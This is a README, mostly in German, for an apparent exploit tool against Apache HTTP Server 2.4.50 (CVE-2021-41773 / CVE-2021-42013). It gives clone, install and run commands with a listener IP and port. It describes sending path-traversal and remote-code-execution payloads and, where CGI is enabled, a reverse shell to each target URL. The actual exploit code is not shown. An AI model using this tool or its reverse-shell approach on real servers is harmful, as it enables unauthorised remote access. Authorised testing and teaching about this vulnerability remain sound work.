
Apache-HTTP-Server-2.4.50-RCE Dieses Tool wurde entwickelt, um Apache-Server auf die Schwachstellen CVE-2021-41773 / CVE-2021-42013 zu testen. Es ist ausschließlich für Bildungszwecke gedacht und sollte verantwortungsvoll nur auf Systemen eingesetzt werden, für die Sie eine ausdrückliche Erlaubnis zum Testen haben.
Dieses Tool dient zum Testen von Apache-Servern auf die Schwachstellen CVE-2021-41773 / CVE-2021-42013. Es ist ausschließlich für Bildungszwecke gedacht und sollte verantwortungsvoll nur auf Systemen eingesetzt werden, für die du eine ausdrückliche Testberechtigung hast.
git clone https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE.git
cd Apache-HTTP-Server-2.4.50-RCE
pip3 install requests~=2.27.1 termcolor~=1.1.0
pip3 install -r add_requirements.txt
python3 50512.py target.txt -ip <YourIp> -port <ThePort>
the text file should contain the url of the target
python3 50512.py target.txt -ip 10.0.2.15 -port 4444



Apache-Versionsprüfung: Für jede URL in der bereitgestellten Datei wird geprüft, ob auf dem Server Apache Version 2.4.50 läuft.
Wenn der Server verwundbar ist: Es wird versucht, den Server auszunutzen, indem Payloads gesendet werden, die entweder Directory-Traversal-Angriffe auslösen oder Code aus der Ferne ausführen. Wenn CGI aktiviert ist: Es wird versucht, einen Reverse-Shell-Payload zu injizieren, um Remote-Zugriff zu erlangen.
Nur für Bildungszwecke: Das Skript ist dazu gedacht, zu veranschaulichen, wie Schwachstellen getestet und ausgenutzt werden können. Die Verwendung dieses Skripts gegen nicht autorisierte Ziele ist illegal und unethisch.
Zweck der Änderung: Zusätzliche Fehlerbehandlung hinzugefügt, die Payload-Logik und RCE optimiert und CVE entfernt.